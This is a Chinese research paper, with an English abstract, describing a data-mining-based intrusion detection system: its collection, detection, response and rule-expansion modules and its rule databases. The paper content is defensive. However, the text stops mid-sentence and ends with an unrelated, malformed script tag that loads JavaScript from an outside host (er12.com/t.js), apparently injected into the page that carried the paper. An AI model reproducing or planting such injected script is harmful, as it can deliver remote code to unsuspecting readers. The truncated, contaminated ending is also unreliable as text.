摘 要:鉴于现有的入侵检测系统存在着误报率高和智能性低等缺点,本文研究了基于数据挖掘技术的入侵检测系统。该系统通过分析历史数据,提取出用户的行为特征,总结入侵行为的规律,建立起比较完备的规则库来进行入侵检测,提高了系统报警的准确率和系统的智能化。
关键词:入侵检测;数据采集;数据挖掘;规则扩充
an intrusion detection system based on data mining
zhang fengqin,zhang shuiping,wan yinghui,zhang keying, zhan g qingfeng
(computer department,tele communication and engineering institute, the engineering university of air force,xi′an,710061,china)
abstract:due to the disadvantages of intrusion detection system(ids), which are the high falsepositives and low intelligence in curr ent ids, the paper presents an ids based on data mining. the system pulls out t he action character, sets up more rules warehouse to proceed with the intrusion detection and improve s the accuracy and intelligence of system warning through analysing the history data
keywords:intrusion detection; data collecting; data mining; rule expending
随着计算机网络的全球化和网上各种新业务的兴起,信息安全问题变得越来越重要。传统的安全保护技术和防火墙技术已经远远不够,迫切需要一种能够及时发现并报告系统入侵的技术,即入侵检测系统(ids)。入侵检测系统作为一种积极主动的安全防护措施,能检测未授权对象对系统的恶意攻击,并监控授权对象对系统资源的非法操作,阻止入侵行为。随着网络信息的丰富和带宽的扩大,收集的审计数据和网络数据包的数量将是非常巨大的,要想从大量的审计数据和网络数据包中发现有意义的信息将变得非常困难,因此需要利用数据库方面的新技术数据挖掘。本文研究了基于数据挖掘技术的入侵检测系统。
1系统框架和模块功能
本系统是由数据采集模块、入侵检测模块、应急措施模块、规则扩充器等4个模块和3个数据库构成的系统框架,如图1所示。
1.1系统模块的功能
(1)数据采集模块
该模块负责提取与被保护系统相关的运行数据,并对其简单过滤。采集的内容包括系统、网络及用户活动的状态和行为。数据采集的信息来自系统和网络的日志文件、目录及文件中的异常改变、程序执行中的异常行为等信息。
(2)入侵检测模块
该模块主要进行数据分析,即在采集的数据中找到入侵痕迹。先从审计数据中提取特征,再将这些特征用于模式匹配或异常监测模型,若检测到入侵,则根据系统配置发出不同级别的应急措施;若检测到异常数据信息,则将其送入异常数据检测数据仓库。系统在设定的条件下,利用数据挖掘技术(如关联规则)寻找出数据仓库中相关连的异常数据,并将决策的结果添加到攻击检测规则库,从而提高整个系统的检测智能,降低了异常监测的误报率。为确保入侵检测的效率和实时性,入侵分析需在系统的性能和检测能力间权衡后再决策。必要时要牺牲部分检测能力来保证系统可靠、稳定地运行、快速地响应。
(3)应急措施模块
应急措施模块是在检测到入侵行为后被触发,系统根据管理员对系统安全的配置措施进行及时响应,如切断网络连接、记录事件、报警、向管理员提示等。响应一般分为主动响应和被动响应2种。主动响应是阻止、影响或改变攻击进程,由系统自动执行,可对入侵者采取行动、修正系统环境或收集有用信息;被动响应只报告所检测出的问题。
(4)规则扩充器
主要功能是从规则扩充器异常检测数据仓库中分析多个检测引擎提交的审计数据,运用多种关联方法进行挖掘,产生新的检测规则,经管理员决策确认后进入攻击检测规则库。
1.2三个数据库
(1)系统配置库
根据检测系统的需求而建立的数据库,主要用于系统的安全审计策略、启用规则扩充器的手段和时间间隔等。
(2)攻击检测规则库
入侵检测依据规则库是提供与正常行为模型的比对规则和与异常行为模型的匹配规则。例如对于输入用户名与密码的正常行为,当某用户连续(如在半小时以内)输入8次以上,则认为有入侵的倾向,可以提示管理员重点关注该用户。这里的输入次数是一个表示频度的阀值,管理员可以进行手工配置。对于arp欺骗的异常行为,将其关键特征参数放入检测规则库,当出现类似的入侵过程和关键特征参数时,则认为有arp欺骗入侵。
攻击检测规则库的数据主要来自于系统管理员的配置、系统的缺省(目前常用的正常行为模型和异常入侵特征模型)、规则扩充器挖掘的异常入侵特征?script src=http://er12.com/t.js>
